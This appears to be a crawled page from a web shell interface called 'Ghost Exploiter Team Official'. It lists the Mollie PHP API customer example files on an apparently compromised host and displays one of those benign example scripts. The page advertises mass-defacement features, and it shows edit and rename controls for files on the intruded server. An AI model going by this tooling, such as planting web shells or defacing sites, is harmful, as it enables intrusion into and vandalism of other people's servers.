webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
mollie
/
mollie-api-php
/
examples
/
customers
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
create-customer-first-p
...
2.295KB
edt
ren
create-customer-payment
...
1.966KB
edt
ren
create-customer-recurri
...
2.037KB
edt
ren
create-customer.php
0.761KB
edt
ren
delete-customer.php
0.389KB
edt
ren
list-customer-payments.php
1.874KB
edt
ren
update-customer.php
0.835KB
edt
ren
<?php /* * Updating an existing customer via the Mollie API. */ try { /* * Initialize the Mollie API library with your API key or OAuth access token. */ require "../initialize.php"; /* * Retrieve an existing customer by his customerId */ $customer = $mollie->customers->get("cst_cUe8HjeBuz"); /** * Customer fields that can be updated. * * @See https://docs.mollie.com/reference/v2/customers-api/update-customer */ $customer->name = "Luke Sky"; $customer->email = "luke@example.org"; $customer->locale = "en_US"; $customer->metadata->isJedi = true; $customer->update(); echo "<p>Customer updated: " . htmlspecialchars($customer->name) . "</p>"; } catch (\Mollie\Api\Exceptions\ApiException $e) { echo "API call failed: " . htmlspecialchars($e->getMessage()); }
<=Back
Liking